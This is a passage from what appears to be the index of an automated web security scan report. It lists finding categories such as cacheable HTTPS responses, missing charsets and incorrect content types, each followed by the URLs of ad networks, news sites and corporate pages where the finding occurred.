23.170. http://www.facebook.com/plugins/like.php

23.171. http://www.facebook.com/plugins/likebox.php

23.172. http://www.facebook.com/plugins/likebox.php

23.173. http://www.facebook.com/plugins/likebox.php

23.174. http://www.facebook.com/plugins/likebox.php

23.175. http://www.google.com/sdch/StnTz5pY.dct

23.176. http://www.myyearbook.com/advertising/default.php

23.177. http://www.myyearbook.com/advertising/default.php

23.178. http://www.myyearbook.com/advertising/default.php

23.179. http://www.myyearbook.com/favicon.ico

23.180. http://www.myyearbook.com/favicon.ico

23.181. http://www.myyearbook.com/favicon.ico

23.182. http://www.myyearbook.com/favicon.ico

23.183. http://www.myyearbook.com/favicon.ico

24. Credit card numbers disclosed

24.1. http://greatponds.squarespace.com/universal/scripts/squarespace-gallery-slideshow.js

24.2. http://rad.msn.com/ADSAdClient31.dll

24.3. http://www.bing.com/search

24.4. http://www.greatpondsma.org/universal/scripts/squarespace-gallery-slideshow.js

25. Robots.txt file

25.1. http://204.124.80.52/dcs5w0txb10000wocrvqy1nqm_6n1p/dcs.gif

25.2. http://ad.doubleclick.net/activity

25.3. http://altfarm.mediaplex.com/ad/js/16024-128483-16880-2

25.4. http://analytics.spongecell.com/placements/47958921

25.5. http://api.facebook.com/restserver.php

25.6. http://cheetah.vizu.com/f.gif

25.7. http://clk.atdmt.com/goiframe/223672189/334126009/direct

25.8. https://code.google.com/p/domsnitch/downloads/list

25.9. http://community.spiceworks.com/r/595

25.10. http://dinclinx.com/

25.11. http://feeds.bbci.co.uk/news/rss.xml

25.12. http://fls.doubleclick.net/activityi

25.13. http://forums-test.vostu.com/clientscript/ncode_imageresizer.js

25.14. http://go.microsoft.com/fwlink/

25.15. http://googleads.g.doubleclick.net/pagead/viewthroughconversion/1071724218/

25.16. http://haymarketbusinesspublications.122.2o7.net/b/ss/haymarketscmagazineus,haymarketusglobal/1/H.21/s25559028366202

25.17. http://i.microsoft.com/en-us/homepage/bimapping.js

25.18. http://i3.microsoft.com/library/svy/broker-config_s1.js

25.19. http://images.apple.com/support/expresslane/data/properties.json

25.20. http://img.mediaplex.com/content/0/16024/128483/lifescript-470x250.js

25.21. http://jlinks.industrybrains.com/jsct

25.22. http://l.addthiscdn.com/live/t00/152lo.gif

25.23. http://metrics.apple.com/b/ss/appleglobal,applehome/1/H.22.1/s45228154349606

25.24. http://mm.chitika.net/minimall

25.25. http://newsrss.bbc.co.uk/rss/newsonline_world_edition/front_page/rss.xml

25.26. http://pagead2.googlesyndication.com/pagead/imgad

25.27. http://paid.outbrain.com/favicon.ico

25.28. http://pixel.everesttech.net/2368/gr

25.29. http://pixel1350.everesttech.net/1350/p

25.30. http://pshared.5min.com/Scripts/ThumbSeed2.Style.js

25.31. http://pubads.g.doubleclick.net/gampad/ads

25.32. http://puma.vizu.com/cdn/00/00/22/09/smart_tag.js

25.33. http://rad.msn.com/ADSAdClient31.dll

25.34. http://s7.addthis.com/static/r07/sh46.html

25.35. http://safebrowsing-cache.google.com/safebrowsing/rd/ChNnb29nLW1hbHdhcmUtc2hhdmFyEAEYlrYDIJq2AyoFF9sAAA8yBRbbAAAB

25.36. http://static.ak.fbcdn.net/connect/xd_proxy.php

25.37. http://tag.admeld.com/ad/js/785/lifescript/728x90/ros

25.38. http://web2.checkm8.com/adam/detect

25.39. http://www.apple.com/

25.40. http://www.betabeat.com/2011/07/19/fever-pitch-new-yorkers-go-starry-eyed-for-start-ups/

25.41. http://www.datacard.com/

25.42. http://www.facebook.com/plugins/likebox.php

25.43. http://www.google-analytics.com/__utm.gif

25.44. http://www.googleadservices.com/pagead/conversion/1071724218/

25.45. http://www.lifescript.com/Health/Conditions/ADD/How_to_Quiet_the_Symptoms_of_Adult_ADHD.aspx

25.46. http://www.microsoft.com/en-us/security_essentials/default.aspx

25.47. http://www.observer.com/wp-content/themes/nyo_tech/js/global.js

25.48. http://www.paloaltonetworks.com/cam/switch/index.php

25.49. http://www.righthealth.com/external/ads/clo.gif

25.50. http://www.scmagazineus.com/

25.51. http://www.walmartlabs.com/

26. Cacheable HTTPS response

26.1. https://acn-members.apple.com/mo_login/login.lasso

26.2. https://domsnitch.googlecode.com/files/v0.707.crx

26.3. https://towernet.capitalonebank.com/loginpage.html

26.4. https://towernet.capitalonebank.com/whatis.html

27. Multiple content types specified

28. HTML does not specify charset

28.1. http://ad.doubleclick.net/adi/N1558.NetMining/B4616765.3

28.2. http://ad.doubleclick.net/adi/N1558.NetMining/B4820225

28.3. http://ad.doubleclick.net/adi/N1558.NetMining/B4820225.2

28.4. http://ad.doubleclick.net/adi/N5327.LifeScript/B5695360.3

28.5. http://ad.doubleclick.net/adi/N5767.dsc.discoveryOX2348/B5649101.33

28.6. http://ad.doubleclick.net/adi/N5823.Discovery/B5629823.10

28.7. http://ad.doubleclick.net/adi/N5823.Discovery/B5629823.11

28.8. http://ad.doubleclick.net/adi/N5823.Discovery/B5629823.12

28.9. http://ad.doubleclick.net/adi/N5823.Discovery/B5629823.16

28.10. http://ad.doubleclick.net/adi/N5823.Discovery/B5629823.17

28.11. http://ad.doubleclick.net/adi/interactive.wsj.com/markets_newsreel

28.12. http://ad.doubleclick.net/adi/interactive.wsj.com/markets_story

28.13. http://ads.pointroll.com/PortalServe/

28.14. http://amch.questionmarket.com/adscgen/st.php

28.15. http://analytics.microsoft.com/Sync.html

28.16. http://analytics.msn.com/Include.html

28.17. http://bs.serving-sys.com/BurstingPipe/adServer.bs

28.18. http://ds.addthis.com/red/psi/sites/www.seashepherd.org/p.json

28.19. http://fls.doubleclick.net/activityi

28.20. http://load.exelator.com/load/

28.21. http://mediacdn.disqus.com/1311185431/build/system/def.html

28.22. http://mediacdn.disqus.com/1311185431/build/system/facebook.html

28.23. http://mediacdn.disqus.com/1311382870/build/system/def.html

28.24. http://mediacdn.disqus.com/1311382870/build/system/reply.html

28.25. http://mediacdn.disqus.com/1311382870/build/system/upload.html

28.26. http://odb.outbrain.com/utils/ping.html

28.27. http://p4.hd7x6e5x4k2yw.toliueuqmj3cr4lx.if.v4.ipv6-exp.l.google.com/intl/en/ipv6/exp/iframe.html

28.28. http://p4.hd7x6e5x4k2yw.toliueuqmj3cr4lx.if.v4.ipv6-exp.l.google.com/intl/en/ipv6/exp/redir.html

28.29. http://scripts.chitika.net/static/hq/lifescript.js

28.30. https://servicing.capitalone.com/favicon.ico

28.31. http://showadsak.pubmatic.com/AdServer/AdServerServlet

28.32. http://static.addtoany.com/menu/sm3.html

28.33. http://support.klout.com/

28.34. http://support.klout.com/favicon.ico

28.35. http://switch.atdmt.com/jaction/CODB_IOC_Overview/v3/atz.FB8DCF93533EFDA4

28.36. http://switch.atdmt.com/jaction/CODB_IPOS_OpenAccount/v3/atz.FB8DCF93533EFDA4

28.37. http://switch.atdmt.com/jaction/COF_Sav_Homepage/v3/atz.FB8DCF93533EFDA4

28.38. http://tag.admeld.com/ad/iframe/610/bostonglobe/728x90/bg_1064637_61606220

28.39. http://trk.etrigue.com/track.php

28.40. http://w55c.net/ct/cms-2-frame.html

28.41. http://web2.checkm8.com/adam/detect

28.42. http://www.boston.com/newsprojects/widgets/twitter/get_tweet_count.php

28.43. http://www.everestjs.net/static/ad_if_c.html

28.44. http://www.hitcon.org/hit2011/

28.45. http://www.hitcon.org/hit2011/download.html

28.46. http://www.lifescript.com/adcontrol.htm

28.47. http://www.lifescript.com/html/comScore.htm

28.48. http://www.nmmlaw.com/templates/nmm_2011/images/bg/spacer4.jpg

28.49. http://www.seashepherd.org/

28.50. http://www.seashepherd.org/news-and-media/2011/07/19/emergency-sos-from-captain-paul-watson-save-our-ship-1263

29. Content type incorrectly stated

29.1. http://a.rad.msn.com/ADSAdClient31.dll

29.2. http://a1.interclick.com/getInPageJS.aspx

29.3. http://a1.interclick.com/getInPageJSProcess.aspx

29.4. http://adadvisor.net/adscores/g.js

29.5. http://ads.adap.tv/beacons

29.6. http://ads.pointroll.com/PortalServe/

29.7. http://aka-cdn-ns.adtechus.com/apps/160/Ad1840288St3Sz154Sq20383166V2Id2/E-160x600.jpg

29.8. http://aka-cdn-ns.adtechus.com/apps/247/Ad1695991St3Sz170Sq20242213V6Id1/extFile1.js

29.9. http://amch.questionmarket.com/adscgen/st.php

29.10. http://articleonepartners.app7.hubspot.com/salog.js.aspx

29.11. http://attributiontrackingga.googlecode.com/svn/trunk/distilled.FirstTouch.js

29.12. http://bostonglobe.tt.omtrdc.net/m2/bostonglobe/mbox/standard

29.13. http://bs.serving-sys.com/BurstingPipe/adServer.bs

29.14. http://cache.boston.com/universal/js/sitelife/DirectProxy

29.15. http://cache.boston.com/universal/js/sitelife/SiteLifeProxy

29.16. http://cache.boston.com/universal/js/sitelife/SiteLifeScripts

29.17. http://catrg.peer39.net/443/131/66315943

29.18. http://consultants-locator.apple.com/favicon.ico

29.19. http://consultants-locator.apple.com/javascript/fancybox/jquery.fancybox-1.3.4.js

29.20. http://consultants-locator.apple.com/javascript/formatDate.js

29.21. http://consultants-locator.apple.com/javascript/jquery.js

29.22. http://consultants-locator.apple.com/javascript/jquery.tools.min.js

29.23. http://consultants-locator.apple.com/javascript/portal.1309219793.js

29.24. http://consultants-locator.apple.com/javascript/tooltips.js

29.25. http://consultants-locator.apple.com/javascript/treeview/treeview-min.js

29.26. http://consultants-locator.apple.com/javascript/wick.1295053156.js

29.27. http://consultants-locator.apple.com/javascript/yui/accordionview.js

29.28. http://consultants-locator.apple.com/javascript/yui/animation.js

29.29. http://consultants-locator.apple.com/javascript/yui/connection.1287529288.js

29.30. http://consultants-locator.apple.com/javascript/yui/container.1287529288.js

29.31. http://consultants-locator.apple.com/javascript/yui/dom.1287529288.js

29.32. http://consultants-locator.apple.com/javascript/yui/event.1287529288.js

29.33. http://consultants-locator.apple.com/javascript/yui/json.js

29.34. http://consultants-locator.apple.com/javascript/yui/utilities.js

29.35. http://consultants-locator.apple.com/javascript/yui/yahoo.1287529288.js

29.36. http://cs.wsj.net/community/content/images/misc/groups/otherquestionmark.25x25.png

29.37. http://cs.wsj.net/community/content/images/misc/members/defaultuser.50x50.png

29.38. http://event.adxpose.com/event.flow

29.39. http://geek.net/favicon.ico

29.40. http://go.ionearth.com/sites/all/themes/ionearth_base/js/cufon/cufon-replace.js

29.41. http://hipservice.live.com/gethip.srf

29.42. http://i3.silverlight.net/css/main.css

29.43. http://images.apple.com/global/nav/scripts/globalnav.js

29.44. http://images.apple.com/support/expresslane/data/properties.json

29.45. http://images.lifescript.com/images/button/sign-up.gif

29.46. http://images.lifescript.com/images/menu/subnavslice.gif

29.47. http://km.support.apple.com/kb/resources/js/ACShortcuts.js

29.48. http://maps.googleapis.com/maps/api/js/AuthenticationService.Authenticate

29.49. http://maps.googleapis.com/maps/api/js/ViewportInfoService.GetViewportInfo

29.50. http://maps.gstatic.com/intl/en_us/mapfiles/openhand_8_8.cur

29.51. http://mediacdn.disqus.com/1311382870/fonts/disqus-webfont.woff

29.52. http://my.seashepherd.org/NetCommunity/view.image

29.53. http://online.wsj.com/public/page/0_0_WC_HeaderWeather-10005.html

29.54. https://onlinebanking.capitalone.com/CapitalOne/Themes/TopTabMenu/Images/banner_01.gif

29.55. https://onlinebanking.capitalone.com/CapitalOne/Themes/TopTabMenu/Images/header_timeout.jpg

29.56. https://onlinebanking.capitalone.com/CapitalOne/Themes/TopTabMenu/Images/vs_img.gif

29.57. https://onlinebanking.capitalone.com/CapitalOne/Themes/TopTabMenu/images/banner_02.gif

29.58. https://onlinebanking.capitalone.com/CapitalOne/Themes/TopTabMenu/images/banner_bg.gif

29.59. http://ots.optimize.webtrends.com/ots/ots/js-3.1/311121/0badc71136ae076478bf83f1541081ef453a111b50cb3c0205ab52e9e820b250c59e028538eac0d71309572f0532760df61ffafd404f7f7ab96572302fa3ef4c6d5dc2c8cd1dc1a174788921c98221c53d967ba94189cac14a16e1f4053786961a7d48d1416a04630911413ae7cd25bf7f10707ad647ed34403ddb452b88e8846c648cd99df5c6f20b46880f9bb57eee5eae54eae4aefb7497150ad28a191670ac26b14d9dc24ee61c3e76cb42707268f260ed7c236543cc412c64472c1072fd236cab74511ddbbbf2526e65bd23f8eb5fa31b8a3212d5a23574333902101bcfc1e80b823a81ca1bc5dc9f7524b31d8674bfbd05ab898e36ca561f24d75e9cbba0646e1f09def18788d536fbb2e4d1097f346606f1ea29773e76a171d4fdcbcc241f33e8c92412a6c8c46f8c1c23faf2b4de0005d7bb03a656aa1e6c2c45a631db0d4de5f0aecaba1d66d217e1e28add9e4f9be3bd00db3412285787c900b2df5bc89de71a29c015b68fd911a704b7560ccb4bc5c899ac25da54e5b44e39dbef3f32d87c80f2a5b2885eb1ca74be75e769d072b660081d77084661fce65bdba0001c49f8d4fb2c8984048edab2fb9da97dab40eeb8c33e0267461c359d6bca5e7885045496d872995a0ef0948fe07b78583ea69e3dca935611c534fb9cacbf76f37e62c34fcc5be9d5e88df4a72430d41eb1a65b0c1c571a8eaf0f40f98fd7410db92b53a3cac79145a5ceaa5650c6e05e22b80403da493353bed5c8b31d09ff097cea50eb716193a69fd28bb5136a45a48c3402b5feac1ebc06cf5e3e73e24c4ca10c43eafd1886f08429f35962c20edeca367e3074915d5a0ca93443f0d8359b2904e55f2c8b109e75943f04ee5d8de83ef32be508211f8ee8f11e9ffa0e93ecf8aa9f4f9937140f7aeb761302bffba078554940735654b111b47f7616a372c4fe10bbcea7983c02ccadc9c9cee987ddba0049a140

29.60. http://ots.optimize.webtrends.com/ots/ots/js-3.1/311121/1027ed543b58578e6e3b824071758d9bdeafd1265a7b24402f7551e927c3acb81cdbfa67bfd3446b42706edbe6b0608936758c58f0c7d1f68b5cd4c42f5e53570bdeeee23870722b7d8b04c597f794d7783788d7dcd698ad7762aafea74aa37fa510cf7fb65c91e76191dbdbfc018d381dcdbf4f180bd9e2e9dbca7cc5c43a11e023d7a7981e3897c9fb0faa723125b37b97068f26a4eab5c4c3548a0c623005a73d5504a9bf9de72f4cd03f9bbbe1e8461e15f54b45d987124df70c44f3c0b4b41a57f9fadff3b4403ba6b53da11aad8870297000d1d58bee13bc8ca059fde624ee792c4eff2ba07f6f45d7b1ce090cefe2d23d748dcadb7f4e9486e790e2c5e2033352659b4256b88303a637cca8448ceb87a0ded8d123b613ac0c1963e359c05e0230e29156736c2a6895f3c1cffa64b9fac27801e8a9146b54a1ff52d056f7f32e3f3a71fef59a588e7f0624829dbaa6efa3b690eabde83297c9688e28391fc14aac6545983263c0c8e390b045be24a4caad2cb5ea74b1748fc205b3f2c51e89a461f341026e5795fcce4d3188e72b0232ca46e3f76599d9c6acfd4c41d4d07573dd137afaca4320220da7d25dd280c6db34bc4f161c396ddaf9d702beafd54328f8656d10a931162f8fb320b997e456b7f579ca99c3819174bdf432231b623d87320c20879e9063c31532f2265f999025ef6544ec230901b74370747a0cfb5f3be20a7d3377877f9bc09bdd0148dc46e6f5c65b2cf0325094b6eba36eca3f9526ef9c9f00876ab065933f067123a51f6a478170716e86c83bbee58dc85a1b26d6ede86650472a8da199989f4f7ce60ef9c141e96c196e2044d7833454dbb20b9f0ad7c5f92328dc654a9934521f753f31faa7515cab99f6833a9340ce09efd927b3aa9154c3e521fcc0ee3556124839da980882ad6cefd9a92b87de7656cc4de422fd9f9bd41bbc084dadd762251153a3b4ea20ae55445a1a722f24b304079665

29.61. http://ots.optimize.webtrends.com/ots/ots/js-3.1/311121/1027ed543b58578e6e3b824071758d9bdeafd1265a7b24402f7551e927c3acb81cdbfa67bfd3446b42706edbe6b0608936758c58f0c7d1f68b5cd4c42f5e53570bdeeee23870722b7d8b04c597f794d7783788d7dcd698ad7762aafea74aa37fa510cf7fb65c91e76191dbdbfc018d381dcdbf4f180bd9e2e9dbca7cc5c43a11e023d7a7981e3897c9fb0faa723125b37b97068f26a4eab5c4c3548a0c623005a73d5504a9bf9de72f4cd03f9bbbe1e8461e15f54b45d987124df70c44f3c0b4b41a57f9fadff3b4403ba6b53da11aad8870297000d1d58bee13bc8ca059fde624ee792c4eff2ba07f6f45d7b1ce090cefe2d23d748dcadb7f4e9486e790e2c5e2033352659b4256b88303a637cca8448ceb87a0ded8d123b613ac0c1963e359c05e0230e29156736c2a6895f3c1cffa64b9fac27801e8a9146b54a1ff52d056f7f32e3f3a71fef59a588e7f0624829dbaa6efa3b690eabde83297c9688e28391fc14aac6545983263dfcfe183b902c26fa198f06ba09a74dc2d9dd314b2d6c8508dea3ea30508261a98e8d5613198ac3f4f6b8900a8b429d8819b99f11c1286c93f298c572badd95c696558ae9f0c99d497d52c971f3e0f7b2083888543e6ee92552bb074324cf667406b8fde45caf3c467f0b914c19784cec701d3d05e456b7a7c87614163cebaa008bd1545932724ece727e96238e8230075b6457f76626cee344b850b051957897be8c1f6da1a57d0398488ac4b22e1520ac3f4bde8399f7a8351b3cace45d831e915c4710f2532b6611847917c6a1feab747acf995fa0b1c35acfa90764a5c73d9f9c7e9e35666936b95be268a691e613a4bd58e6465c4f449c067dc91a33b02cb7f5fc50816597a797f92a71317acc4e6c877dd64a176ecda3ca8c5f530bd8322e9d9886c1146642fd3837d98b60fb68cd74bf8bf660d8c25f653f384f1ec24d57e40d18f21654d1afde2a43ad80766763a393d378a95a0d0a114ed6dee18feed7d40ac5d0ca298b74e18fd1d1a155ec038416abf9f1eea7fb487fb6c4cd3de4974940d48f413ab82bd125c7b1672a09090b0aad5a03580d44ddca7dd662118f572e38d0a52debddfd1010b7ac77ea00b30e7d6e50bdd71d44bb0fa7c9ca97cb7c98759dfe110c8f926b84f7fe2a48e819f36ff35a52add046452e4a76c3c4b7372201bf28e1cb66933939d9eb370b4ec2371a52216521ce237a5025a929e90e89d6af40687cbc0702584030cf05d61fc1b22c03c88879220167fd372e6b1faba801a45bb5dff3979b5f9e390fdbd5ff32d9b38c418392fccbc6bbc1dd790bb34df9fe61c2c43167b4a49761cee929ad556e9e36bbefce42a567a2f0a159899683c1149d3c7e37c004f30c74e49a0c1db2fc70559da5ab0d39ef43a489a3c167fc58a6bf47ac8b8602d41daa4555422b04aad21da10153b36d4c5923938f2b980680fdb01acad38586f6ece725a00592aea2a58375258e7a0a7a0a7d056861c8a7f036048dde45accaebee81e8b590c7384fabc2406460ce1c717fad60bada7382eb45a59dad6a6688a02643faf905273500b953dcaa0fd0699e6149a42a232b96c331d8e6d4477fd288a05cadad7fe322863bf8e0c308e8e9dc5b37c7f551f385b4f81fb34dae9d43ef239f8db09a2ef033a7105c1d5bf3a55a54d02f0772cbfafc48b17ecddbff30e8eae3b6caf77a73f4c336a1ce8f591016ff28e90d7450a76eff8cc7c274d5395b3bfb37ca9eaa47d4509c0c77a3e7881a713f9cb55f87f5321ff05df064910caa8c724160e9a49c1a4b217d18c95278ab4cfa40ca940b8e60b37af23ae433288d77f95c5400e33e3045d46367e2ceadb721902cfb3e3864c75a44a2a781f6f95325d349fb1a86bbfe239f4d3341e9890f3ab4bb899564a0be17ef98767e00d3eefb6d6e2417d7ae832cfd6d6775d7d69f754c6700bd3abe3e49ec4918027f60f10dee733e46b9c3f938fb069edb7cfd750b193ef2551071a7d8ac6ff6ed1a8b1988fe45c826b90dec9cd98be5f70f6f26c5743c6b8da338df1e1a1710568ccdca3deeefd6cecbc2a1169135385aa5728f943096e4333826758a4ee7be95e4a05c6db118cd3622321809b9a68f0b572d54267545a7fb3ff1ebecc9419ad7886874a03f937bd4009938554e3e9b36a1e75600acf69685c778e2af7b9cfed919b9ffa2e2e60123cfc2105f300be6e1a9f531e925d6fe0b10bafc2321053f1cb703b4c2844fd046d64a5ea46269793d27ab574ec2c457529ae05027e30f656b8f0c83721cb335f67131a1d69ed15e43d788c71c1013089784d845dbb576169330c255e434662e219fd0ea3db8581b703d8e30b4d2b9e518223100f6c0c3ecfeac24f759bf6c55ced5d7422eb5d028332/1311280499290-658/0/5

29.62. http://ots.optimize.webtrends.com/ots/ots/js-3.1/311121/1027ed543b58578e6e3b824071758d9bdeafd1265a7b24402f7551e927c3acb81cdbfa67bfd3446b42706edbe6b0608936758c58f0c7d1f68b5cd4c42f5e53570bdeeee23870722b7d8b04c597f794d7783788d7dcd698ad7762aafea74aa37fa510cf7fb65c91e76191dbdbfc018d381dcdbf4f180bd9e2e9dbca7cc5c43a11e023d7a7981e3897c9fb0faa723125b37b97068f26a4eab5c4c3548a0c623005a73d5504a9bf9de72f4cd03f9bbbe1e8461e15f54b45d987124df70c44f3c0b4b41a57f9fadff3b4403ba6b53da11aad8870297000d1d58bee13bc8ca059fde624ee792c4eff2ba07f6f45d7b1ce090cefe2d23d748dcadb7f4e9486e790e2c5e2033352659b4256b88303a637cca8448ceb87a0ded8d123b613ac0c1963e359c05e0230e29156736c2a6895f3c1cffa64b9fac27801e8a9146b54a1ff52d056f7f32e3f3a71fef59a588e7f0624829dbaa6efa3b690eabde83297ca658e2d7e638f51a17253e62a7fffd4a2ddfe438d2ee59bea3af3a232c03dcc8157ea978d4cd6a469e343127057d7bfe8763abcf03c435b8b06a8ab33d387cfc8fe0b1591c96939835066ea984c697621aad753d89197c375e55d7965726d83b4895ae6fbc44d3386156e14a93305329fdc44d2e88220a0f96083aab5f2f573aa961511747130962c1f3596fdf71bb3193ae42434eee026e16838eb260177ad43797c740f8d5f3bef244e4d02877beec0eed21a54c73a858cb80a65ef4e0ac6f5b6e6389a728d52a5c1c554b951816fa4195e6332a868184bc6247e5ca0bb4da1acc1a40d522becaec2310e0c31999095a2a80828b056ab9c03e37463095c35d982474fadb20dcf11d5c0fd54438b6915985c221f253a4488812457fceea0e2208a37d705e8cb48a191a70496b47eb898e21b5713476f89d52ae4e03ae787d03e92ce12118b51f521e58ee99b45a4004facc00f7e411bfdf7bf72ef5b4f763d240430bd9da0f1fd50bf7fec1ffeed7c5eaf4d0cab82b74618fc19066d078507477aa29619ab55a1dad95356c9c36e44940b598d42e8c8b21344661472be8292b1a1c6a63f8fd75fabfb8e320302f966f8d0335dd9fae8ed1a0161d673a5426de980e140d9249f54b9ae7cddb678eb99834e88b401e3bd7cfd176abcf2c898ea3da938ea02fd032b05a4ae392c5343796647f9f619a63b3396cbd5b773e5a7682ef4735d054ab666be000592def0e7987efd138ecbd238178d0e4fd37d66b31237c93c9acfba33567bd066cffacab595151cae06ab6d729ef6e684f4a856f33fd31dcd511f2fca886dbd01c5b2fc09c386b9487841194e51556c07fbdb86ae14c1e47ca5e7ee115f65642747b6b33c64716dc8d7e5451a533fc75d35efefc023c6054cc175a0c0e7a76e16c3635633a4c832a122c4d4192148c8d21c7a13ee048512e77a6565319e98d9636de391d16707df56a8b9370d633ed0210e525b30e42258305d1a8cabd7cea8b82ca719883d77044ddae70e9cacaa8610de56150bd88aff5e5a631087b66082a379d8845a2eb64850a681927bf27c1850d0e311101405c606b0e0be4aeeb02a9d2aa453ae541b35866838078f5df377b3aca4af56301ed2e10741fe989086bb3d274d08755140b5bd219de0c366fa66a9f07efbe5105c146bb7b4df5032c3400792317aeda2f5d852e2d9ddad09d5ac4410d252c74728191d70d983a66906ea948cd65c1360f890bc25794b5985b4b7a226d0b4f62c1e51b2830a4102e0d87180e933865c39138267a5723569ac83b02c6a4a9b5fcfe1e94791c4b72bdcba808c2cae0fe1ac5761ea3b89037a8f9a77ce86305874b0140f432c7d30a78d231e07d9b5b5dd1c78fb595737317499335d2184f99f3796e23ee9ea33299090d2f70fea8b544c0be17fe78477e30c24eeb2d6e4456102b177f0d0c66a547a28dd419b4a28d7baefe295c3b38c69af4c4cd1e73a853ede7ddad2ee10b1ec9e8b05b997e27b145e5026d58be917968797cece9202e640a6f5f98be6cc4816a3c75a781a9ab88e7cabcbb4b20b0431998faadaeea764b9bb5c333b110b84a9260b83615f4e356380332e85906ff73f154ae8fd4cd48e731211ac899073fbf164904c2e1a1c69fde040b1978015bd2281c40050f262b00945da9f44b9f7b3671f525b37940c2f47709f34b9ff81f695c3e2e2373d7d0f3bbd2602ad1bf32f17af6f7fc51462fba01caa8a744b5dd9d92d25402542fb166e71fea0402f9bc9db60b660ec734e2f28b7160f6f0fc54aa4f6d96406ca3341711a2f5121a84db37b64c831f45c21e6295c9352ae51363f044f731959463ef64cb154b9c99cdbff0edce5185c24944dd96351282c1234d3e2c6542286d09804f44e7475ec4a15d026/1311280711520-955/0/4

29.63. http://ots.optimize.webtrends.com/ots/ots/js-3.1/311121/1027ed543b58578e6e3b824071758d9bdeafd1265a7b24402f7551e927c3acb81cdbfa67bfd3446b42706edbe6b0608936758c58f0c7d1f68b5cd4c42f5e53570bdeeee23870722b7d8b04c597f794d7783788d7dcd698ad7762aafea74aa37fa510cf7fb65c91e76191dbdbfc018d381dcdbf4f180bd9e2e9dbca7cc5c43a11e023d7a7981e3897c9fb0faa723125b37b97068f26a4eab5c4c3548a0c623005a73d5504a9bf9de72f4cd03f9bbbe1e8461e15f54b45d987124df70c44f3c0b4b41a57f9fadff3b4403ba6b53da11aad8870297000d1d58bee13bc8ca059fde624ee792c4eff2ba07f6f45d7b1ce090cefe2d23d748dcadb7f4e9486e790e2ceea0b244f73924150e4851eaf77c4af078ceac7bc95cfcd21f514bd03137fe24bd3210025f9ba446a7c715395e6bfcffb5aa0a8c52932e9aa046641bbef04c138c7e7220c0b48faf3be5b9a2a3035c1d5f4fc8aecf6c5e7bdfe70d4dd4d812839219001e57855c84e2eb1caf499b852de7fe58dea01e0ab09b67883d529bdc0cf0b98a461fc43117445cbad883473cee03f416c8d32ada22884c996d0b0221495dc6d7ee90829a38d4c2e2c4c9bd857c986ddad77b70879652b7fc2f7c45feee8af1975ae2e7c13ba32162f8f8c109497db37afed36d79585df8311cbd650572a2f68ce6b4b7f87e9be08ca7438f22d3bece727e96334e1260e70b0417d6f6e19f7283cf7721a3766fd0efddefab44c148a54c3d5dd2127eb3c0ebbfdd1f23b8e7a8b5caab8cb41d9289813c6784e6739b2620434950c6a04e7b34edffeeabf4d6435a7f283685e2810a98bd2ebf92875f20e89c243eb631a192345d6f03832d1c502bb17a0c3fc2041f96719e528410731647ebd8e0903a1ded0d379c664ff2483b557dcdae854a6b178adb3a32851295539da987585b60da096c27ae292501c8343f523f588e29747a50f49a9d67b3a700ce2e1b160b95921401a0f1c0f9cab86e0be1ef872fe04f3b23e03f80e58fbd0e61e00f50f196f7586781c6fb58b19ad5cbbd1bd080093f61802c74d03ff06ae9faa11306c1471e2c4c3f4f5c3a63d90d72ab4f9fc317c59f475fac679099ff198c350583afa7e8d3a70e8d4f716ac65c94bf5b92199a97ea8c9f21684b553e3f92baf4429bf81df9dee2df933a93ce001341af2f36d7d4e56273e12af8948a26965c79e80e130b4ce2b7ad130425140b173e70f0d82d1a9e49a3da947cd9ef56f42db505fab2d31f14a77956acbd3b763092bc067e5eef5b8c34e5af808d87a66e1aeb6c6a3ed0cac7fcd69910d44739cfe3cff4684dda24d9dc0b24c6935551f111f2d2bb89d9a9115caee67befaf360023c247a3bc6d7331a721293c7e2581f5920c0564ab4a9810d905f68c052a098b1f931438a705742b4d244b338d7ac52750eaf9d5d4335fd03e015cb4a2d203bcfc4867472a4bdb7055e9e44f2e57c5e7861c10c05513d74b7694e2f4b15d997f5f484a725e0138829586a488ab11d81b9db8278a4291770c7f3fb3b45704ae8d213f3d208a9f52650c72427c8d7f27f8d141958b29558715506805b8ba1f616e8e9698a38ad5ef7164173fd1c34079c5df57cbeaeacab5a2102c5e15a02bba2b9d9d53f26453f770e2cadae2fd9e0c464a664d4d708b2e9043d7719cda0be374dae3e049d685ab8fbd885639daaa6a07edbb5487ff662f166596c7968a8ead75522cbb386dd31620b8c9ec17a2a0802c7e8e4e63ba784ae764057a4d25447588c8b70d0bd5e9e0c35118f72a877636bb8d8a0357914a64dc0a2b0539f80e77bd4ec9ef67cf949bbec0a33bb27fc0771cbdd5a90ca581b5781767122516d3baa8e31031494e4ccc5156e9504123d5c2fc261782787bfd929ebb26daf8f606acfdea6ae5bc8fb305908f10fea8c659b1b4dfeaece9a220464d315ef9b9f3a5f6630d559da6539f5a8fed9b4f691846ea31a13ce8148891dfd4d9187a23abaa1d9c02dde9dd40970272f46bff78273ed8a9dbeb2e4719d47c18d9ff3ccec0b4ce0ee794a02eb94da378ffdcdeb1a4d77b6b9d3aef5fe7696e70b27355305dbec3b2ec9625d59696dd9137f95cd6ff73f3c76bbaa1b93d5657373d49e9d30a0b575d3426702087fe8af18e895cb4ef97f86841c01ac6bbd11568a0123cabc

29.64. http://ots.optimize.webtrends.com/ots/ots/js-3.1/311121/1027ed543b58578e6e3b824071758d9bdeafd1265a7b24402f7551e927c3acb81cdbfa67bfd3446b42706edbe6b0608936758c58f0c7d1f68b5cd4c42f5e53570bdeeee23870722b7d8b04c597f794d7783788d7dcd698ad7762aafea74aa37fa510cf7fb65c91e76191dbdbfc018d381dcdbf4f180bd9e2e9dbca7cc5c43a11e023d7a7981e3897c9fb0faa723125b37b97068f26a4eab5c4c3548a0c623005a73d5504a9bf9de72f4cd03f9bbbe1e8461e15f54b45d987124df70c44f3c0b4b41a57f9fadff3b4403ba6b53da11aad8870297000d1d58bee13bc8ca059fde624ee792c4eff2ba07f6f45d7b1ce090cefe2d23d748dcadb7f4e9486e790e2ceea0b244f73924150e4851eaf77c4af078ceac7bc95cfcd21f514bd03137fe24bd3210025f9ba446a7c715395e6bfcffb5aa0a8c52932e9aa046641bbef04c138c7e7220c0b48faf3be5b9a2a3035c1d5f4fc8aecf6c5e7bdfe70d4dd4d812839219001e57855c84e2eb1caf499b852de7fe58dea01e0ab09b67883d529bdc0cf0b98a461fc43117445cbad883473cee03f416c8d32ada22884c996d0b0221495dc6d7ee90829a38d4c2e2c4c9bd857c986ddad77b70879652b7fc2f7c45feee8af1975ae2e7c13ba32162f8f8c109497db37afed36d79585df8311cbd650572a2f68ce6b4b7f87e9be08ca7438f22d3bece727e96334e1260e70b0417d6f6e19f7283c